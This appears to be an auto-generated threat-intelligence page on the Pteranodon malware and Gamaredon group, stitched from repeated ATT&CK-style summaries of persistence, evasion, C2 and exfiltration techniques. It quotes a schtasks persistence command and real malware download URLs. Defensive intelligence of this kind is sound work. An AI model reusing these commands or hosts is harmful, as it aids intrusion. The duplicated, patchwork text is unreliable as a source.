Pteranodon

The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.

Historically, according to the 2015 LookingGlass report Operation Armageddon: Cyber Espionage as a Strategic Component of Russian Modern Warfare, Gamaredon conducted spearphishing campaigns using stolen, highly relevant decoy documents of mimicking Ukrainian institutions to target government entities.

The malware executable sets up as a task as “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

Attack Pattern Command-Line Interface - T1059

During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.

"Макрос містить у собі VBScript..."; "...створюються файли з розширенням .exe та .vbs..."; "...vcqkmwhafaky.exe – ... містить у собі VBScript."

Attack Pattern User Execution - T1204

The attackers started with spear-phishing messages using a self-extracting 7-zip file, which was downloaded via the system’s default browser.

The malware executable sets up as a task as “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders. | The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.

The malware executable sets up as a task as “schtasks /Create /SC MINUTE /MO 12 /F /tn Word.Downdloads /tr” to run every 12 minutes

During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.

Examples include malware copied to '%AppData%\Microsoft\Windows\Start Menu\Programs\Startup', creation of '.lnk' shortcuts in Startup, and scripts or batch files placed in Startup folders. | The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, or .lnk files in the Startup folder.

"...компіляція UserSupport.cs завдяки csc.exe(компілятор С#)... до UserSupport.exe"

One of the notable features of the malware Interop component is its usage of the fake Microsoft digital certificate belonging to Microsoft Time-Stamp Service.

Many entries explicitly describe deleting artifacts 'to cover tracks,' 'evade detection,' 'remove evidence,' 'reduce their footprint,' or as part of 'post-intrusion cleanup process.' Examples include APT28 deleting files to cover tracks, FIN5 using SDelete to clean up the environment, and Dragonfly deleting operational files as part of cleanup.

The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.

The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'

Multiple actors and malware families are described as using mshta/mshta.exe (including renamed mshta.exe) to execute malicious scripts/HTA/HTML/VBScript/JavaScript, download and run payloads from remote servers, and in one case help schedule tasks for persistence.

Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. Bisonal can check to determine if the compromised system is running on VMware. Bumblebee has the ability to perform anti-virtualization checks. CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Saint Bear contains several anti-analysis and anti-virtualization checks.

"...надає ... інформацію щодо назви пристрою, назви накопичувача та його серійного номеру"

“3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory… admin@338 actors used… dir c:\ >> %temp%\download … APT28 has used Forfiles to locate PDF, Excel, and Word documents…”

Agent Tesla has the ability to perform anti-sandboxing and anti-virtualization checks. Bisonal can check to determine if the compromised system is running on VMware. Bumblebee has the ability to perform anti-virtualization checks. CozyCar will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. Metamorfo has embedded a "vmdetect.exe" executable to identify virtual machines at the beginning of execution. RTM can detect if it is running within a sandbox or other virtualized analysis environment. Saint Bear contains several anti-analysis and anti-virtualization checks.

This virus collects system data, regularly sends it to command-control servers and expects further commands.

The content repeatedly describes adversaries and malware storing collected data, command output, credentials, archives, or files in local temporary folders, working directories, hidden directories, registry locations, recycle bins, or specific files prior to exfiltration.

"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"

Attack Pattern Automated Collection - T1119

Tool Telegram Used as C2 channel by UAC-0010 and others Tool Telegraph Used for IP-based C2 routing by UAC-0010

The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.

"...автоматично завантажуються файли з розширенням .dot..."; "...завантажує scaffold.exe з http://tridiuma.ru/scaffold.php"; "...отримують код з ... http://barbatus.online/get.php"

Malware Remcos RAT Remote access trojan used for persistent access ... Malware NetSupport RAT Legitimate RMM tool abused as malware

Attack Pattern Automated Exfiltration - T1020

ADVSTORESHELL exfiltrates data over the same channel used for C2... Agrius exfiltrated staged data using tools such as Putty and WinSCP, communicating with command and control servers... numerous malware and groups sent victim data, files, credentials, or host information over existing C2 channels.